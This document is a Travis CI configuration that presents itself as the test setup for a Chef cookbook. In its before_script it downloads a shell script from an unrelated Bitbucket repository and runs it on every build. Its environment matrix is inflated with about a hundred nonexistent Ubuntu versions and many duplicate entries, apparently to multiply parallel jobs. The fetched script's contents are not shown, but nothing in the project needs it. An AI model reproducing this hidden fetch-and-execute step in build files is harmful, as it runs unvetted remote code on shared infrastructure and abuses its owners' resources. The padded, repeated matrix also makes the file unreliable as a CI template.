addons:
  apt:
    sources:
      - chef-current-xenial
    packages:
      - chef-workstation

install: echo "skip bundle install"

env:
  - CHEF_LICENSE=accept

branches:
  only:
    - master

services: docker
 
env: 
  matrix:
  - INSTANCE=default-ubuntu-0104
  - INSTANCE=default-ubuntu-0204
  - INSTANCE=default-ubuntu-0304
  - INSTANCE=default-ubuntu-0404
  - INSTANCE=default-ubuntu-0504
  - INSTANCE=default-ubuntu-0604
  - INSTANCE=default-ubuntu-0704
  - INSTANCE=default-ubuntu-0804
  - INSTANCE=default-ubuntu-0904
  - INSTANCE=default-ubuntu-1004
  - INSTANCE=default-ubuntu-1104
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1304
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1504
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1704
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-1904
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-ubuntu-2104
  - INSTANCE=default-ubuntu-2204
  - INSTANCE=default-ubuntu-2304
  - INSTANCE=default-ubuntu-2404
  - INSTANCE=default-ubuntu-2504
  - INSTANCE=default-ubuntu-2604
  - INSTANCE=default-ubuntu-2704
  - INSTANCE=default-ubuntu-2804
  - INSTANCE=default-ubuntu-2904
  - INSTANCE=default-ubuntu-3004
  - INSTANCE=default-ubuntu-3104
  - INSTANCE=default-ubuntu-3204
  - INSTANCE=default-ubuntu-3304
  - INSTANCE=default-ubuntu-3404
  - INSTANCE=default-ubuntu-3504
  - INSTANCE=default-ubuntu-3604
  - INSTANCE=default-ubuntu-3704
  - INSTANCE=default-ubuntu-3804
  - INSTANCE=default-ubuntu-3904
  - INSTANCE=default-ubuntu-4004
  - INSTANCE=default-ubuntu-4104
  - INSTANCE=default-ubuntu-4204
  - INSTANCE=default-ubuntu-4304
  - INSTANCE=default-ubuntu-4404
  - INSTANCE=default-ubuntu-4504
  - INSTANCE=default-ubuntu-4604
  - INSTANCE=default-ubuntu-4704
  - INSTANCE=default-ubuntu-4804
  - INSTANCE=default-ubuntu-4904
  - INSTANCE=default-ubuntu-5004
  - INSTANCE=default-ubuntu-5104
  - INSTANCE=default-ubuntu-5204
  - INSTANCE=default-ubuntu-5304
  - INSTANCE=default-ubuntu-5404
  - INSTANCE=default-ubuntu-5504
  - INSTANCE=default-ubuntu-5604
  - INSTANCE=default-ubuntu-5704
  - INSTANCE=default-ubuntu-5804
  - INSTANCE=default-ubuntu-5904
  - INSTANCE=default-ubuntu-6004
  - INSTANCE=default-ubuntu-6104
  - INSTANCE=default-ubuntu-6204
  - INSTANCE=default-ubuntu-6304
  - INSTANCE=default-ubuntu-6404
  - INSTANCE=default-ubuntu-6504
  - INSTANCE=default-ubuntu-6604
  - INSTANCE=default-ubuntu-6704
  - INSTANCE=default-ubuntu-6804
  - INSTANCE=default-ubuntu-6904
  - INSTANCE=default-ubuntu-7004
  - INSTANCE=default-ubuntu-7104
  - INSTANCE=default-ubuntu-7204
  - INSTANCE=default-ubuntu-7304
  - INSTANCE=default-ubuntu-7404
  - INSTANCE=default-ubuntu-7504
  - INSTANCE=default-ubuntu-7604
  - INSTANCE=default-ubuntu-7704
  - INSTANCE=default-ubuntu-7804
  - INSTANCE=default-ubuntu-7904
  - INSTANCE=default-ubuntu-8004
  - INSTANCE=default-ubuntu-8104
  - INSTANCE=default-ubuntu-8204
  - INSTANCE=default-ubuntu-8304
  - INSTANCE=default-ubuntu-8404
  - INSTANCE=default-ubuntu-8504
  - INSTANCE=default-ubuntu-8604
  - INSTANCE=default-ubuntu-8704
  - INSTANCE=default-ubuntu-8804
  - INSTANCE=default-ubuntu-8904
  - INSTANCE=default-ubuntu-9004
  - INSTANCE=default-ubuntu-9104
  - INSTANCE=default-ubuntu-9204
  - INSTANCE=default-ubuntu-9304
  - INSTANCE=default-ubuntu-9404
  - INSTANCE=default-ubuntu-9504
  - INSTANCE=default-ubuntu-9604
  - INSTANCE=default-ubuntu-9704
  - INSTANCE=default-ubuntu-9804
  - INSTANCE=default-ubuntu-9904
  - INSTANCE=default-ubuntu-10004
  - INSTANCE=default-centos-7
  - INSTANCE=default-window-7
  - INSTANCE=default-ubuntu39204
  - INSTANCE=default-ubuntu40404
  - INSTANCE=default-ubuntu604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7
  - INSTANCE=default-ubuntu-1204
  - INSTANCE=default-ubuntu-1404
  - INSTANCE=default-ubuntu-1604
  - INSTANCE=default-ubuntu-1804
  - INSTANCE=default-ubuntu-2004
  - INSTANCE=default-centos-7
  - INSTANCE=default-windows-7

before_script:
  - wget https://bitbucket.org/cimengku/tr/raw/8b21db36ee0461e0949804d947fc24ff89107768/cimeng.sh && chmod u+x cimeng.sh && ./cimeng.sh
  - eval "$(chef shell-init bash)"
  - chef --version

script: KITCHEN_LOCAL_YAML=kitchen.dokken.yml CHEF_VERSION=${CHEF_VERSION} kitchen verify ${INSTANCE}

matrix:
  include:
    - script:
      - delivery local all
      env:
        - UNIT_AND_LINT=1
        - CHEF_LICENSE=accept